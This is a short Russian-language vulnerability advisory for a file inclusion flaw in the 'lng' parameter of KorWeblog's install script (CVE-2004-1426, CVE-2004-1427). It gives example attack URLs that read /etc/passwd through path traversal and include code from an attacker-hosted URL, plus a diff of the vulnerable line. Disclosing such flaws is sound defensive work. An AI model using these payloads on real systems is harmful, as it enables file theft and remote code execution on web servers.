Дата публикации: | 03.01.2005 |
Всего просмотров: | 2430 |
Опасность: | Высокая |
Наличие исправления: | Нет |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-1426 CVE-2004-1427 |
Вектор эксплуатации: | Удаленная |
Воздействие: | Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | KorWeblog 1.x |
Уязвимые версии: KorWeblog 1.6.2-cvs и более ранние версии
Описание: Уязвимость обнаружена в сценарии '/install/index.php' из-за некорректной фильтрации входных данных в параметре 'lng'. Удаленный атакующий может создать специально сформированный URL и выполнить произвольный php сценарий на уязвимой системе с привилегиями web сервера. Примеры: http://[target]/weblog/install/index.php?lng=../../../../../../etc/passwd%00 http://[target]/weblog/install /index.php?lng=../../phpinfo http://[target]/weblog/install/index.php?lng=../../include/main.inc&G_PATH=http://[attacker] URL производителя: http://weblog.kldp.org Решение: Решение не существует на данный момент.
--- index_1_6_1.php Mon Dec 27 17:31:50 2004 $G_VER = "1.6.1"; -if (!empty($lng)) include("lang/$lng" . ".php"); $sql_form ="<P> |
|
Ссылки: | KorWeblog php injection Vulnerability |